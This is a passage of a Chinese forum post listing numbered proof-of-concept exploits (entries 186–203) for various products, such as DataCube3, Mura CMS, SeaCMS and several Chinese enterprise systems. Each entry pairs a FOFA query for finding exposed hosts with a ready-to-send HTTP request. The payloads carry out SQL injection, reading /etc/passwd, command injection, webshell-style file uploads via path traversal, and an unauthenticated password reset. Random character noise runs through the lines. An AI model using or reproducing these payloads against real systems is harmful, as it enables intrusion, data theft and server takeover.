186. F-logic DataCube3 SQL注入
2 ^7 U m s5 p1 ]7 dCVE-2024-317504 k$ l F5 A0 l/ b+ H7 l9 Y9 O
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统8 o) }( _% x2 y, P
FOFA:title=="DataCube3"
0 t( W# c) L4 ]+ V |$ |1 JPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1( \/ e7 S8 M/ J! t! Z O
Host: your-ip
& |2 h) ]9 E, S+ l7 OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0+ e A" [+ G J" G8 \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
# t( T8 Z6 F* r' AAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: b) {) }/ H7 n. k& \/ X8 |5 I0 fAccept-Encoding: gzip, deflate' d% l1 e4 h0 m
Connection: close
/ L- u$ Y' U- R3 B. hContent-Type: application/x-www-form-urlencoded5 `9 _1 w+ ?" S7 Q
$ e& j/ E' W& w/ ?req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
! h0 U$ m! G! i) {1 G- t9 n. H
" Q8 q n. a5 D9 L1 I% a0 f8 Z
P v" Z) O; a0 W1 f3 I! i8 L B- R; J7 A187. Mura CMS processAsyncObject SQL注入
" n! \" Q; \$ Y( g3 ^9 _$ ]CVE-2024-32640$ h7 [2 n; e( _7 K2 k, ?7 I3 W
FOFA:"Mura CMS"3 s8 _( a; Y9 c \5 Q& e
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
: M" e' m$ Z' i! k) A- B: OHost: your-ip
0 }7 A) z* z$ nContent-Type: application/x-www-form-urlencoded2 r; ~/ y R% F6 K, v) ~/ y6 N: a
* m2 [' n5 e, f3 q' o# c4 Y* t
& P9 J7 {) \+ m. J" Aobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=13 j/ T* _$ I5 `* _& Y- z
. g1 K& E# X9 G0 |' u! L
% i, T$ d9 v; X7 g5 i1 P' ]188. 叁体-佳会视频会议 attachment 任意文件读取
4 G' ?! _$ u9 `: Q5 @& n4 {version <= 3.9.7
9 O/ V" T* V) N% C) S1 H, BFOFA:body="/system/get_rtc_user_defined_info?site_id"
! n) E) c! ^( b2 F. VGET /attachment?file=/etc/passwd HTTP/1.1' |0 Q' J4 T7 J7 ~9 F; T
Host: your-ip6 u. I/ m( t3 T" r7 a7 G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
/ p0 k2 q$ E1 g4 @* |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% X5 j- q% x1 S, d0 [: {. a6 WAccept-Encoding: gzip, deflate( d+ z; o" a+ ]( q& b2 b D
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8- @& Z l# T$ ^
Connection: close
5 I% A3 I. J3 R% Z1 k. ^- H& V" {0 Y" Y6 J1 H5 \3 `; A
- c6 G4 r' w: f8 o/ q, q
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
3 ?: |- H/ q4 r& _6 T8 |( VFOFA:app="LANWON-临床浏览系统"- E$ t% {0 M( w6 D0 L
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
2 ^; U) k* K8 o* h8 DHost: your-ip. x* [# A1 |* {5 S, g5 ~* _- b
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
7 U$ c7 R1 `' u1 C( YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 I. D. n- t( ]
Accept-Encoding: gzip, deflate
0 a0 G5 E0 }* S$ C! MAccept-Language: zh-CN,zh;q=0.9! c" H9 }+ s: J
Connection: close! V" X* J" k) j( C5 d. W
+ ?2 B9 L+ g+ C% `
6 F% S5 }$ Q- M8 [190. 短视频矩阵营销系统 poihuoqu 任意文件读取
: ]' G$ N @5 V/ c& s' K& `, yFOFA:title=="短视频矩阵营销系统"2 X/ l+ f& H7 b# h
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
# C1 i% G' W, {, dHost: your-ip
" W$ }2 {7 |8 i$ H! I# @$ gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36& W1 y T* e5 E+ }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
$ E! c4 T7 w! h' hContent-Type: application/x-www-form-urlencoded
. ]# u/ O! |( Z/ B' W( D' Z" `Accept-Encoding: gzip, deflate
$ ]' e- y5 }" k) ]+ \: XAccept-Language: zh-CN,zh;q=0.92 R& Q3 @% Y+ b* z
8 P1 f1 w1 e+ b' s, e$ l
poi=file:///etc/passwd
3 U2 x5 b* a: W* W: `( S R0 _/ T' V
5 g0 u- k6 O. I: s: {% A3 @' ~
. A* O# x9 l3 q8 `3 p4 @' _7 Q191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入/ B3 E0 l8 \7 Y! ]
FOFA:body="/CDGServer3/index.jsp"5 |& L6 L0 U# k4 q- [, I; J" B
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
' f. G% e6 r. o* U" YHost: your-ip8 h6 [2 G+ E: ~: f" H) `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36% ` j" z6 o% ]1 d( h; p, \
Content-Type: application/x-www-form-urlencoded) C0 r* U+ H5 Y ?2 p* B
( z8 u7 r9 l' K+ M0 R4 b
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
: x u: W2 c6 P7 b& _; Z% {/ ^2 Q) y8 a/ }7 j' W
6 G; y, f* g$ ~3 e, y3 j192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
( S2 O; j# u. t( ~" E) NFOFA:title="用户登录_富通天下外贸ERP"
' h& T: x Q, p( n5 a( q) @ bPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
; p; C% K, Z9 V. t$ BHost: your-ip" B6 c# q+ J; D Q0 T% @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
/ k1 w9 }# B8 N8 O A0 ^Content-Type: application/x-www-form-urlencoded! i! ?/ Y. u# ?: H" Y7 Y2 i
4 O8 ]% P1 Y1 y8 t* X( D$ Z! A+ r+ p1 Y8 `
<% @ webhandler language="C#" class="AverageHandler" %>
) y7 u. ?" {$ N/ }using System;) U* T; Z; @! N! {( e& o
using System.Web;
0 q. x: N4 @9 e- [& M% Z. z6 dpublic class AverageHandler : IHttpHandler
5 n+ l/ r# H" W{- n8 W& ]' n4 h2 J& V7 D0 `
public bool IsReusable
6 {5 }+ W$ r& e* q' \, { R6 T* M{ get { return true; } }
) F. |+ x- C# s$ epublic void ProcessRequest(HttpContext ctx)# k$ ?$ K! d9 R* r7 T* }. X
{. U' V/ I/ {0 ^: ~
ctx.Response.Write("test");5 z5 t( N, K, {* H g4 N
}
B7 z9 o$ B/ p$ U" G/ e}. ?2 N; p" ~2 t% u8 b/ j4 s
6 \* J7 @% t* B' @. z5 y% v# ~* r, Y5 ?
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行0 G$ ?, ~# B' o: F8 y3 S" k {& x
FOFA:body="山石云鉴主机安全管理系统"0 m/ V! g' J; d" \" x! i* [
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
8 D6 N- _3 V. UHost:% J: x. r3 f) t8 \" `- M/ o
Cookie: PHPSESSID=2333333333333;
p( v8 u; e# B6 W3 EContent-Type: application/x-www-form-urlencoded
& `5 Y6 a" |0 X# M" |1 U4 JUser-Agent: Mozilla/5.0
( ~( D* t1 R# I- T# B" l! c& |" V' ~: }* [
2 D% F7 [* T8 c5 C* WPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
6 D& G' s) x' J' p1 y2 OHost:
/ k! f7 |1 S# b& V4 OUser-Agent: Mozilla/5.0- N& l7 v1 `% v8 K' a
Accept-Encoding: gzip, deflate
9 q v% r' |. g8 C8 WAccept: */*
2 [9 K& |& Y- n6 |: YConnection: close" \) c6 z1 G& l3 G) V
Cookie: PHPSESSID=2333333333333;. B7 z! x T7 V+ S6 k/ K
Content-Type: application/x-www-form-urlencoded; `' A4 ]3 i( r5 I9 o/ [
Content-Length: 84% X! z: Z1 @3 I/ v. s0 _
. ^. i3 ~% X* ^( w& ]param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
) ]7 h S4 C9 U7 d
' a/ y. Y( f/ \9 u, z) x6 b# Y. z$ A) c* [& m
GET /master/img/config HTTP/1.1- Z- ^5 y3 d8 \9 K$ ^# ]9 `
Host:
3 V: f/ r1 B" a% W/ iUser-Agent: Mozilla/5.0/ Q+ ]2 P; }5 u! ~( I
% X% y2 o1 l9 Y
: E) s, G: [3 r& p- i194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传. Y% ?, q9 I$ K& |% J
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
* `; a+ a% [# w
+ m) |; _) q) E" l' n4 T) @2 wPOST /servlet/uploadAttachmentServlet HTTP/1.1
8 ^, J2 d2 m6 t6 mHost: host
0 e: J: S( a5 Q) n% q+ b8 b6 j+ rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
4 d3 Z7 u8 _& V) k) e! WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8$ Y6 H4 I( {# d/ x
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 \: ?7 G" ^& E6 H* N! A: |
Accept-Encoding: gzip, deflate
+ C1 r# T% x( W& W) jConnection: close
' u b: ` H4 i) r+ |Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
* M W7 ]/ Z# }1 w" p* U------WebKitFormBoundaryKNt0t4vBe8cX9rZk! U( U3 O6 y$ ~2 Y8 G; E
3 d( _. R' O$ U4 |$ YContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
' O* l6 `- K7 T8 `' DContent-Type: text/plain
; @9 A* L0 @# j6 X# C5 D v<% out.println("hello");%>8 }7 j( T3 }; J% @, C
------WebKitFormBoundaryKNt0t4vBe8cX9rZk7 U$ g$ Q) I8 }, j( e& J
Content-Disposition: form-data; name="json"
# @: n/ t4 X+ ^ {"iq":{"query":{"UpdateType":"mail"}}}
# z h4 F( T- Z* l------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
5 \1 Y A( {! G# U( N1 V8 U5 m" k8 ~! w( d2 ]3 h/ Y1 ^
3 y" m" L3 o5 R6 y6 l, q' j
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
! y" F( ]6 ^$ H; \8 ^8 X. Q; KFOFA:title=="飞鱼星企业级智能上网行为管理系统7 c. Z: W6 m& u+ b) A5 G
POST /send_order.cgi?parameter=operation HTTP/1.1! B8 b% G- [6 G4 Z8 \; W) {+ O
Host: 127.0.0.1, @0 J% T f* b, H4 ?8 Z
Pragma: no-cache
, }$ P9 V) K- m2 k& v0 d; ^' N' ECache-Control: no-cache
% z& d* r) \& y- b- AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36; ~$ `+ g! C1 O8 F" G) ]
Accept: */*5 [' |0 k. h1 Y* |* `
Accept-Encoding: gzip, deflate
' D3 O' v, `$ kAccept-Language: zh-CN,zh;q=0.9
6 T6 x& A$ J" Z$ a' B# }Connection: close
9 o m3 q; p2 ^# r F, @# @/ J$ FContent-Type: application/x-www-form-urlencoded
7 U2 B9 P+ {: BContent-Length: 68
1 f: `' A( @0 s1 v1 o& `2 g2 P7 c" r& @2 r, L# q2 P- W
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}7 Z- g& h" q" x; a6 B/ y
6 |, i7 D! V9 D
( i+ _) k. n9 H4 G! o196. 河南省风速科技统一认证平台密码重置
7 A. }, S: L7 X7 \FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
6 f7 p0 ~& t# l9 L3 `( k! a2 x W ]POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
, d% |1 \; d/ h, f% x- v8 SUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.368 O& m, ?* b" y! M
Content-Type: application/json;charset=UTF-81 U& j6 z- _ G" h T, {3 }
X-Requested-With: XMLHttpRequest
f# B2 K+ l% \: ]; k5 y- C0 NHost:
5 I* {% S1 _9 |# A0 L& z) VAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2. E; X3 a% O2 h5 \ Z
Content-Length: 45
: f4 M! O( U0 vConnection: close
# D: k4 _4 O( h" C* a2 u+ c/ T0 K% w3 |' _3 D% q. q
{"xgh":"test","newPass":"test666","email":""}
' |1 w6 H0 H& y5 s6 y. k# r$ i* T& b, Y
* u) y% d0 U6 J% _( |* r
: k7 W3 @: U) A ~: K197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入, K; H! L; I6 g8 S
FOFA:app="浙大恩特客户资源管理系统"4 C% I% i5 g& H( d
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1' j' _- @5 G7 u4 b" _
Host:
2 ]9 E5 a4 I" r' OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36. g G$ a2 y/ F( F6 g7 A
Accept-Encoding: gzip, deflate
7 C% R4 u. H$ c- S5 ZConnection: close6 f0 w4 v1 ^# o
) L' P/ o0 X5 F u7 Y( V8 i4 L3 b* t, \. I" ~6 ^8 h3 M8 |
2 F4 i7 _9 ?( d* Y( [' [' @. f7 J
198. 阿里云盘 WebDAV 命令注入
% f. a& t2 D9 Z# v7 i4 r8 L. fCVE-2024-29640
" l; Z' }7 g* I, B4 l" pGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
( I% g! W+ Y% R8 Z& u6 hCookie: sysauth=41273cb2cffef0bb5d0653592624cf64" i1 w% t3 \. m: x
Accept: */*
4 b8 |0 e- o3 i+ H; w1 f) B1 hAccept-Encoding: gzip, deflate
9 Q( _9 A+ c$ y! ^9 d8 {. hAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
$ P* `" n1 x! K2 u; X) G4 \$ jConnection: close* O8 w4 y7 S& a! i* K) v6 O
$ T% C, p4 D" X, s5 k! K. R! P$ I9 M8 w. i
199. cockpit系统assetsmanager_upload接口 文件上传
+ H/ [" a4 W* T) s! B5 ?- n8 c5 m9 X- n) Q0 P+ y
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
; z. ?* W4 a% m1 r" W7 D+ @GET /auth/login?to=/ HTTP/1.19 y' b& ]3 }- k! X. i& t$ E8 U
" ^7 X. D4 h1 V1 b响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"+ O! S$ a2 a+ \$ Y. M8 U
( F; _) O; B ]2.使用刚才上一步获取到的jwt获取cookie:
/ E* o4 I. ]2 z4 q# C
y% e& R0 }0 OPOST /auth/check HTTP/1.1
' d2 a" F4 m- d0 w4 w X, G3 [9 YContent-Type: application/json6 H, G6 M. M2 r0 B
4 N! O0 j w. `5 N/ B
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
5 L2 h) N8 e q2 f9 h9 \3 E) m) t; q x7 N6 T" X. T
响应:200,返回值:
' K: d3 _8 i0 S, G9 ZSet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/# F: u( w' P/ M" E7 r- d
Fofa:title="Authenticate Please!"$ Z& _9 T" l7 {9 n, X, s
POST /assetsmanager/upload HTTP/1.15 {" o$ U- k4 W$ v
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
5 _* p( u) S' I! ^Cookie: mysession=95524f01e238bf51bb60d77ede3bea92& G3 M) e% C! `1 @( Y3 k
4 _" E* K2 ]4 k0 l
-----------------------------36D28FBc36bd6feE7Fb3! t8 h: `8 N* ]0 [; r; ~6 [
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
( X: \+ `, D. Y, }* p5 d7 A9 mContent-Type: text/php
! D& [ \; B7 A+ Y& d' X3 n) [( @+ D) u4 Z( W5 ^$ w
<?php echo "tttt";unlink(__FILE__);?>
( K+ E d5 W/ q; t) n4 N-----------------------------36D28FBc36bd6feE7Fb3& A8 d- N' U2 i& u% s) d
Content-Disposition: form-data; name="folder"5 v( o+ m" C8 r
, c; _" n5 ~& q, M) Q" b
-----------------------------36D28FBc36bd6feE7Fb3--% ?) t; P, @. l4 O/ G- O i
7 _7 w3 Z% g5 h ?" c# ? q2 s- L9 n
/storage/uploads/tttt.php* C8 }7 p% X1 M+ W
& X3 k% _- I, l: C) W200. SeaCMS海洋影视管理系统dmku SQL注入' B0 c }- K6 d; C$ y# Z0 }
FOFA:app="海洋CMS"0 D' D# n/ B! ~3 E4 Z- Z. z
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1/ `+ I; ]- t% d/ S
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
' ~5 s3 D+ @0 j+ bUpgrade-Insecure-Requests: 1
; R: T' [6 T& w: ^) |+ y2 _Cache-Control: max-age=0
( K- J. G" M2 j4 f( k4 C; dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; k5 |5 s% ^7 F/ e
Accept-Encoding: gzip, deflate; @$ d9 {0 C- c/ E, a7 f
Accept-Language: zh-CN,zh;q=0.9
/ t. S: \6 ] V
: ?0 t. @' S' N: }: P
' j l& t3 u+ a+ F* [/ `9 v5 T201. 方正全媒体新闻采编系统 binary SQL注入9 j1 r0 M# K: S" o, F+ e
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"/ S$ W& j5 E+ X- Y1 ]
POST /newsedit/newsplan/task/binary.do HTTP/1.1$ u& m, b* ^; u" F/ {# Q! S
Content-Type: application/x-www-form-urlencoded$ w, S% T' k Q! l
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 b4 Y$ j/ j# p( Y. w: DAccept-Encoding: gzip, deflate
& t3 u) T: b& ?/ |) D* F) D! gAccept-Language: zh-CN,zh;q=0.9
% M9 C$ J' b- Q) m$ tConnection: close
! {( T8 t4 \ c/ S- O% B
5 C4 a* P ]- BTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1; `" @& ^+ D2 q; N
2 c+ E1 c1 c' u2 \% C- C
* a/ w' s' P& N5 A+ A% ]202. 微擎系统 AccountEdit任意文件上传; [5 Z4 F# Z! o/ w6 e
FOFA:body="/Widgets/WidgetCollection/"
8 x# q8 v: q" R3 J* s获取__VIEWSTATE和__EVENTVALIDATION值" w( c. \/ p7 P8 g
GET /User/AccountEdit.aspx HTTP/1.1
4 H6 b' a7 d. OHost: 滑板人之家: M }8 M2 b( V0 v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31/ f& t. Z- A# d ^! O' d
Content-Length: 0
, y7 }8 t, A- B6 W
- |/ E8 a/ m1 J% {6 S0 b* b/ j( ] b' W/ U3 A/ O; E. n1 @
替换__VIEWSTATE和__EVENTVALIDATION值
0 ^. k, B" q+ l! O* jPOST /User/AccountEdit.aspx HTTP/1.1: p" E7 o6 S% O' I/ U7 ]) L
Accept-Encoding: gzip, deflate, br
* H7 M3 w: J4 e$ m( A+ E4 N/ O( lContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
- k8 _& d5 \0 U# ^% w' O/ `
3 _/ \! f4 y# e2 l' Z% ^2 u-----------------------------786435874t38587593865736587346567358735687' }, d! [+ ~$ U2 [- Q* F
Content-Disposition: form-data; name="__VIEWSTATE"1 o$ ~8 Y1 ~+ \2 T
9 u0 b2 N' y/ n/ w% z) T5 {
__VIEWSTATE. f9 b( p7 F& ~. Z- x
-----------------------------786435874t38587593865736587346567358735687, P- b6 `& G$ F4 j& t
Content-Disposition: form-data; name="__EVENTVALIDATION"
3 _8 t# D9 P( D& S8 o5 u4 y9 H2 o& i$ h" E( Z8 x8 R1 v+ F
__EVENTVALIDATION
# I. O5 Q! i2 h, o" m-----------------------------786435874t38587593865736587346567358735687+ I2 C; _* W7 P0 l$ d0 H
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
: b5 c9 ~6 r9 l; d8 ^0 k7 vContent-Type: text/plain* E @+ H* y. _3 q6 j
) n# o% Y, k4 S
Hello World!
" O* [+ r5 B% j% [-----------------------------786435874t38587593865736587346567358735687
/ x2 K, A. ]. S+ I3 E# ~; w. U' o7 h* I0 DContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
- J5 W( h- ^: j# f
& s* H' v) a$ L0 J, v3 w. H4 |& N上传图片4 G- Y2 `7 y! l" s8 A: U
-----------------------------786435874t38587593865736587346567358735687
( Q- K$ n# v7 w$ y) wContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
9 V' \ b K7 h- n" K
9 q6 W8 W8 Q. `
* o: P l2 {% B0 M# l" [-----------------------------786435874t38587593865736587346567358735687
% W; X! A% K u6 ?" c, GContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"* Y4 m3 y- H$ L0 f
( d' Z# S+ A4 B/ i5 ?
4 G8 W1 ?; f" U1 w, |( H4 m-----------------------------786435874t38587593865736587346567358735687--
5 a7 J6 E, }' b1 Q$ L' K9 d# \4 y
; @. _8 u; B, K$ |& K" m, F0 ^5 W& R- {! f& k- s* l
/_data/Uploads/1123.txt
! j/ i |: S0 c% @+ J1 \8 b9 O/ f* l7 g; p9 I5 z
203. 红海云EHR PtFjk 文件上传5 s0 ~% q$ V5 b' S
FOFA:body="RedseaPlatform"
7 \* t# X/ i) R$ ]; c4 L3 r& ]# NPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
( L( }: f3 u5 ~Host: x.x.x.x3 t5 {, G' ]8 F' r/ @+ q- A
Accept-Encoding: gzip
9 |2 d4 b- A4 M3 T. t/ xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. p M, p: I8 CContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4) R" ?. h1 k6 X9 M
Content-Length: 210 t$ b( t6 ~ G
3 A, k3 R; p! b0 s- ~------WebKitFormBoundaryt7WbDl1tXogoZys4. Q7 |; F& {' P1 e; X
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
6 Q5 S/ t2 L1 X. ?0 c( BContent-Type:image/jpeg
b0 V/ ^0 i. W% Z5 A" [ K2 n
2 b& T7 q) N/ x7 l. s4 w h<% out.print("hello,eHR");%>, Q+ [& n' g1 r7 l- f$ T( |& B
------WebKitFormBoundaryt7WbDl1tXogoZys4--0 }: B4 X7 H d4 u
3 p" V K+ i+ c$ o6 I
8 @0 a5 e8 B% Z, r4 w0 Q6 l1 U( v0 M* Z0 C3 b; _5 {
q5 t5 O1 ]7 ~+ o9 m
& |: Z2 D& x$ Y
) h4 ?# u3 L$ c+ j' V7 b* v
|
发表于 2024-6-5 14:31:29
收藏
支持
反对